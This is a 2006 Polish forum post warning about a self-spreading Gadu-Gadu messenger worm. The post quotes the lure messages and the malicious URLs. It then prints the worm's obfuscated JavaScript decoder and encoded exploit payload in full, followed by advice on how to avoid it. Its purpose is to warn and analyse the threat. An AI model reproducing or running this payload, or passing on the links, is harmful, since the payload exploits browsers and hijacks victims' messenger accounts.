#Lu
Administrator
Dołączył: 14 Paź 2006
Posty: 110
Skąd: Black Mage Village
|
 Wysłany: 2006-11-19, 13:00 Natr?tny Exploit!!
|
|
|
Otó? ostatnio po sieci gg kr??y taki ma?y natr?t. Przejawia si? tym, ?e otrzymujemy wiadomo?? w stylu:
| Kod: | wybuch w niemczech http://www. supercqb.com/material_2006_19_11_11416.html
|
albo
| Kod: | warto przeczyta? http://www. acbouquets.com/jak_to_bylo_11444.txt
|
Generalnie wiadomo?? sk?ada si? z linku i zach?ty do jego otwarcia. A co powoduje jego otwarcie? Otó? Buffer Overflow (przepe?nienie bufora) w naszej przegl?darce, a nast?pnie uruchomienie gg i rozes?anie (bez naszej wiedzy) tej samej wiadomo?ci do ca?ej listy kontaktów. Nie znalaz?em w tym jakiej? destrukcyjnej dzia?alno?ci, ale kto wie?
Uda?o mi si? za to dosta? do kodu tego ustrojstwa:
| Kod: | function dec(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,22,39,30,14,38,57,12,46,21,0,0,0,0,0,0,24
,17,32,42,15,6,35,1,37,41,55,31,5,62,48,26,28,23,3,51,10,60,45,40,34,49,43,0,0,0,0,27,0,2
,16,13,8,11,58,33,44,18,36,19,20,50,61,0,47,9,52,25,4,53,56,29,54,7,59);for(j=Math.ceil(l/
b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+
=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dec("sO
VYQSPuAQ@mtphNbkhNoF6gDkUrt_VYQSPuAKv5L4cYQQWuLXsgbp7N1_7Y9RPFyadrAisjladr
AisjladrAisjladrAisjladrAisjladrAisjladrAisjladrAisjl3dF31@NTQWJLOwg4Xsg1zsg@QWrcSPmo
Q@F1p@mophNAJPgs1@HwQq291sH91qF31WuLfd5Lanmo_VYtQcNc3dBbSsHP1qBbSsHP1qBb
Q6NoK7Bb_IHb37BbD6jESqBbJsHySqBbJsH9iqBbRUN1OqBbRUHAOqBbRUYRk7BbRP29aqBb
DUNo_7BbDUNRD7BbJ6Yi47BbyUNAa7BbRUNoD7BbDsjoD7BbRhHtD7BbS6NkEqBby6HR_qB
bS6NkEqBbDqNoeqBbRUN9OqBbRUNoK7BbDsjoD7BbK729OqBbDqHwTqBbR7HtkqBbQIj9O
qBbRUNliqBbRUNoD7Bbk7Yk4qBbK72oK7BbeIjwTqBbDqjliqBbQIjokqBbRUNl47BbRUNoD7B
bk7Yk4qBbK72oeqBb_7YwTqBbksHb47BbQIjQE7BbRUN9E7BbRUNoD7Bbk7Yk4qBbK72o_qB
bQsHwTqBbQ6NQiqBbQIjw47BbRUN137BbRUNoD7Bbk7Yk4qBbK72RD7BbKqNwTqBbQqYP4
qBbQIjbTqBbRUNQmqBbRUNoD7Bbk7Yk4qBbkUNRK7Bbyhjk47BbSqYQO7BbD6jlaqBbDhjtk
7BbRP294qBbRUNoR7BbK7HoD7BbSqYk4qBbDsjEK7BbRUYtk7BbR7NwaqBbDsjyDqBbDhjyk
7BbQIjySqBbRUNkEqBbRUNoD7BbJIjyD7BbD7jGSqBbS6NEQqBbes29TqBbRUNoD7BbD6joD
7BbDhHtk7BbKqYkEqBbK6NkO7BbD6jyD7Bb_UNtk7BbksHwTqBbRUNoD7BbKUNoD7Bbk7Yk
EqBbJqjRK7BbKUjoy7BbK7YkEqBbQIjReqBbRUNwa7BbRUNoD7Bbk7Yo_7BbKs2ED7BbKhHo
D7Bb_7HPiqBbKs2wi7BbRUYtD7BbJqYPTqBbRUNoD7BbSqYl1qBbDsjED7BbRhHtk7BbR7Nwa
qBbDsjyDqBbDhjyk7BbkUN9TqBbRUNoD7BbJqjoD7BbKhjoJqBbk7Yo_7BbyhYEK7BbKhY1Eq
BbksHy_7Bb_UNPi7BbKhYyD7Bbk7YkEqBbJqjR_qBbKUjok7BbK7YkEqBbQIjReqBbRUNE_7B
bRUNoD7BbRUNwaqBbSqYl1qBbDsjED7BbRhjtk7BbRPNwaqBbDsjyDqBbDhjyk7BbDUN9Tq
BbRUNoD7BbJqjoD7BbDsjl1qBbDUNtk7BbR7NwaqBbDsjyDqBbDhjyk7BbRUN9TqBbRUNoD7
Bbk7NoD7BbKPNyyqBbQqNo_7BbQqNo_7BbQqNo_7BbQqNo_7BbQIHkO7BbK7joK7BbDsjy_
7BbQsN1aqBbKPNlxqBbQ6Nl1qBbDsjyk7BbDsj9OqBbRhjP3qBbKUHkEqBbK72o_qBbSIYkEq
BbDsjG_qBbD7HP37BbRhYPTqBbK72lO7BbSq2kEqBbRhYED7BbyhYlO7BbkUjQ4qBby6HtR7
BbKIYo_7BbyhYySqBbRPHlmqBbDUNbiqBbksNGRqBbRhjP37BbKqHQa7BbRhYoKqBbkUNlE7
BbkqN9EqBbkqHGyqBbSqYykqBbK7j9i7BbQsjkEqBbK7jkEqBbRhYEK7BbJq213qBbRhHkEqBb
DsjtyqBbDhHyRqBb_6Ho_7BbRUYkEqBbRhYkEqBbK7HQi7BbKsNyKqBbRUNoeqBbk6Y9TqBb
ksHliqBbK7Yl1qBbkhHyy7BbkPHtKqBbRUNtkqBbesjkxqBbesHiEqBbK6N1i7Bb_6jQ47BbKqN1
4qBb_q21iqBbKqN1mqBb_IH13qBbKqN1aqBb_Ij14qBbD6HQ47BbDqNkmqBbeIjQ47BbDqNk
mqBbDqjQa7BbDqjixqBbQsH916g7fs5TOVYQSPuApqCp5qvWK4vgQWnJ_45yXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
dXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXd
XdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdXdX
6jk462KM62_865_3vgy3vBR4vBDMvFD8vXe8vVJ3zVS4zhSMzp0
Mz8z8z823fI246jk4WZpMfZZ8fCZ46jk4WrkDnrK0nJKpnx_pnYyKUYRD
UNR0USD0UmepUmJK0nJD0USD000000
QsH91qHliqHQ36HQOIH1OsjAEsjbaqjb46jk4IjiTIjwxs2wmq2Pm6XiFUry8s5Ta4f2R3v_a"); |
Sposób na zabezpieczenie si? przed tym?[/b]
Skopiowa? link do flashgeta lub innego Download Managera, ?ci?gn?? na dysk i otworzy? w notatniku(!). Jak zobaczymy niezrozumia?y ci?g znaków (zaczynaj?cy si? od zwykle od <script language='javascript'>) to poprostu ignorujemy link.
Ewentualnie pomóc mo?e zablokowanie javascript w przegl?darce, ale nie sprawdza?em tego.
EDIT:
Jeszcze jedno - Wiadomo?? rozsy?a si? tylko w?ród u?ytkowników gg, na tlenie to nie dzia?a, ko?czy si? tylko zwisem/zamkni?ciem przegl?darki. |
_________________
 |
|
